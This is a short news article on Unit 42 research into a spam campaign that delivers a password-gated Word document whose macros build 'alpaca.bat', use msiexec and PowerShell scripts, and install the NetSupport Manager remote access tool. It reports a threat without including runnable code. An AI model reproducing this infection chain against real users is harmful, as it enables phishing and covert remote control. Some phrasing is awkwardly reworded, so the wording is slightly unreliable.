The legit remote access tool (RAT) referred to as NetSupport Supervisor, utilized for troubleshooting and tech support, is being used as a malicious weapon by cybercriminals. Researchers at Palo Alto Networks’ Unit 42 unit have noticed a spam campaign making an attempt to deliver a malicious Microsoft Word doc that makes use of the disguise of a NortonLifeLock-protected file.
NortonLifeLock is a security application for password-protecting attachments, among other issues. If a recipient opens the document through Microsoft Office Outlook, a dialog box appears that asks users to “allow content” to open the document – clicking “yes” executes macros.
Researchers stated the password is likely provided in the body of the phishing email since it has to be correct. No malicious activity takes place until the right key is typed. Once the key is approved, the macros build and execute a batch file titled ‘alpaca.bat’.
The campaign makes use of a range of techniques to unclear its activity from dynamic as well as static analysis, based on researchers. For instance, the batch script uses msiexec, which is a legit part of the Windows Installer service.
It’s utilized to install a Microsoft Intermediate Language (MSIL) binary from a real domain, which has been compromised. Once downloaded, the binary will execute using the /q parameter to stop any Windows dialogs from the user.
The campaign uses the PowerShell PowerSploit framework to install the malicious file. The MSI installs a PowerShell script in the sufferer’s %temp% directory titled REgistryMPZMZQYVXO.ps1.
This contains another PowerShell script that is used for installing the NetSupport Manager RAT onto the target’s system.